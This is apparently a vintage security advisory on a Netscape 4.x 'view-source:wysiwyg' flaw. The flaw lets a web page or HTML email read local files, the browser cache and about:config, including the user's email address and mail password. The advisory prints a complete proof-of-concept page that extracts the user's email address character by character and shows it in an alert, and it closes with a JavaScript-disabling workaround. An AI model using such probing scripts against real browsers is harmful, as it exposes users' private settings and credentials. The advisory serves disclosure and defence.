COMMAND

    Netscape

SYSTEMS AFFECTED

    Netscape 4.x

PROBLEM

    Georgi   Guninski   found   following.    There   is   a  security
    vulnerability  in  Netscape  Communicator  4.6  Win95,  4.07 Linux
    (probably  all   4.x  versions)   in  the   way  it   works   with
    "view-source:wysiwyg://1/javascript" URLs.   It parses  them in  a
    "view-source" window.   The problem  is that  it allows  access to
    documents   included   in   the   parent   document   via   ILAYER
    SRC="view-source:wysiwyg://1/" using find().  That allows  reading
    the whole parsed document.  Vulnerabilites:

      - Browsing local directories
      - Reading user's cache
      - Reading parsed HTML files
      - Reading  Netscape's  configuration ("about:config")  including
        user's email address, mail servers and password.
      - Probably others

    This vulnerability may be  exploited by using HTML  email message.
    Demonstration is available at:

        http://www.nat.bg/~joro/viewsource.html

    viewsource.html:

    <HTML>
    <BODY>
    <SCRIPT>

    s="view-source:wysiwyg://1/javascript:s='<TITLE>tttt</TITLE>vvvv>>"
    +"<ILAYER SRC=\"view-source:wysiwyg://1/about:config\"></ILAYER>"
    +" <SCRIPT>blur();msg1=\"Your email is: \"; mend=\"general.\"+\"title_tips\";mag=\"mail.identity.useremail\"+\" = \";sp=\" \";res=mag;charstoread=50;"
    +"setTimeout(\" "
    +"for(i=0;i<charstoread;i++) {"
    +" t=res;"
    +" find(mend);"
    +" for(c=1;c<256;c++) {"
    +"   t=res + String.fromCharCode(c);"
    +"     if (find(t,true,true)) {"
    +"      res=t;"
    +"      if (c==32) i=charstoread+1"
    +"     } "
    +" }"
    +"}"
    +"res=res.substring(mag.length);"
    +"alert(msg1 + res);"
    +" ;\",3000);</"+"SCRIPT>'";
    //a=window.open(s);
    location=s;


    </SCRIPT>

    </BODY>
    </HTML>

SOLUTION

    Workaround: Disable  JavaScript.   Netscape is  notified about the
    problem.